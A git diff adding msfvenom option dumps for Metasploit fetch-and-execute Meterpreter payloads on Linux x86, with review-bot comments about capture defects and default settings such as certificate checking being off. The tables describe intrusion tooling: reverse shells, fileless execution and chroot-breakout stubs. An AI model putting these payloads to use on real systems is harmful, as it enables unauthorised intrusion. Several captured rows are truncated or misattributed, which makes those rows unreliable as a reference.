b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..451e8a3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt 
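Review bot: in cmd-linux-https-x86-meterpreter-reverse_tcp.txt (the hunk just above) the defaults worth documenting for anyone using these dumps as an operator reference are "FETCH_CHECK_CERT false" together with "FetchSSLCert ... (default is randomly generated)": as generated, the curl or wget fetch of the stage runs over TLS without validating the server certificate, and turning FETCH_CHECK_CERT on is only useful if the certificate supplied via FetchSSLCert is one the target trusts. "FetchSSLVersion" additionally lists SSL3, TLS1 and TLS1.1 as accepted values, which a blue-team reader may want to know when writing detections for this stager. A short README note covering these two points would make the dumps more useful than the raw option tables alone. The author block here again starts with a truncated fragment "pid7.com>".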
@@ -0,0 +1,115 @@ + + Name: HTTPS Fetch, Reverse TCP Stager + Module: payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: +Evasion options for payload/cmd/linux/https/x86/meterpreter/reverse_tcp_uuid: +========================= + + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME bWINkGebCEL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID 
value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_http.txt new file mode 100644 index 0000000..20762e6 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_http.txt 
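Review bot: the `AppendExit` row in cmd-linux-https-x86-meterpreter-reverse_tcp_uuid.txt carries the identical description as `PrependChrootBreak` ("Prepend a stub that will break out of a chroot (includes setreuid to root)"), which does not fit an option named AppendExit; re-run `msfvenom -p cmd/linux/https/x86/meterpreter/reverse_tcp_uuid --list-options` and check whether the column alignment slipped or the wrong description was captured. The header block of the same file is also damaged: `Platform: Linux, Linux` lists the platform twice, `Rank:` is empty, and the three author names (skape, egypt, OJ Reeves) sit under the `Evasion options for ...` heading with no `Provided by:` line above them, so the capture interleaved or dropped lines. Regenerate and confirm that `Provided by:` precedes the authors and that the evasion-options heading is followed by its own table (or omitted when there is none).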
@@ -0,0 +1,109 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x86/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x86/meterpreter_reverse_http: +========================= + +nt_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME joUpgmbF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + 
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_https.txt new file mode 100644 index 0000000..7427d6e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_https.txt 
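Review bot: the author list in cmd-linux-https-x86-meterpreter_reverse_http.txt is truncated to `nt_cook@rapid7.com>`, a fragment of an email address with the name and opening bracket lost, and it appears under the `Evasion options for ...` heading while the `Provided by:` line above it is empty; lines were dropped or reordered here and the file should be recaptured. Two values will also churn on every regeneration: `FETCH_FILENAME joUpgmbF` is a random per-run default, and the `HttpUserAgent` default differs from the _reverse_https dump in this same patch (this one ends in `Edg/131.0.2903.86`, the other stops at `Safari/537.36`). Either post-process those two values to a fixed placeholder or state in the commit message that they are randomized. Finally, the `HttpUnknownRequestResponse` default has lost its HTML tags and is split across three lines with only `It works!` surviving, so the file no longer records the real default; capture it on one line with the markup escaped.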
@@ -0,0 +1,111 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x86/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x86/meterpreter_reverse_https: +========================= + +_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME OfrUNrBi no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to 
use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..c4191a1 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-meterpreter_reverse_tcp.txt 
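Review bot: cmd-linux-https-x86-meterpreter_reverse_https.txt shows the same capture defects as its _reverse_http sibling: an empty `Provided by:` line, the author fragment `_cook@rapid7.com>` under the evasion-options heading, a bare `It works!` line where the `HttpUnknownRequestResponse` default should be, and a random `FETCH_FILENAME OfrUNrBi`. The truncation length of the author entry changes from file to file (`nt_cook`, `_cook`, `rent_cook` across this patch), which suggests characters are being lost at line boundaries during capture rather than a stable output format; redirect msfvenom's output straight to the file instead of copying it from a terminal. One thing worth keeping in the file as documentation, since it is security-relevant and correctly recorded: both `FETCH_CHECK_CERT` (the fetch stage) and `StagerVerifySSLCert` (the Meterpreter HTTPS transport) default to `false`, so neither leg verifies the server certificate unless the operator turns it on.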
@@ -0,0 +1,103 @@ + + Name: HTTPS Fetch + Module: payload/cmd/linux/https/x86/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/https/x86/meterpreter_reverse_tcp: +========================= + +rent_cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MxocCAOef no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + 
MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-metsvc_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_bind_tcp.txt new file mode 100644 index 0000000..277fbc4 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-metsvc_bind_tcp.txt 
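Review bot: cmd-linux-https-x86-meterpreter_reverse_tcp.txt repeats the empty `Provided by:` line followed by a truncated author fragment (`rent_cook@rapid7.com>`) under the evasion-options heading, and `FETCH_FILENAME MxocCAOef` is again a random per-run value; treat it the same way as the other fetch dumps in this patch (recapture, and normalize or annotate the random default). The advanced-options table itself looks consistent with a TCP transport (`ReverseListenerThreaded`, `StagerRetryCount`, `StagerRetryWait` present, no `Http*`/`Override*` rows), so nothing else stands out in this hunk.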
@@ -0,0 +1,96 @@ + + Name: HTTPS Fetch, Linux Meterpreter Service, Bind TCP + Module: payload/cmd/linux/https/x86/metsvc_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + hdm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NJariKgTawY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. 
+ Stub payload for interacting with a Meterpreter Service + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a 
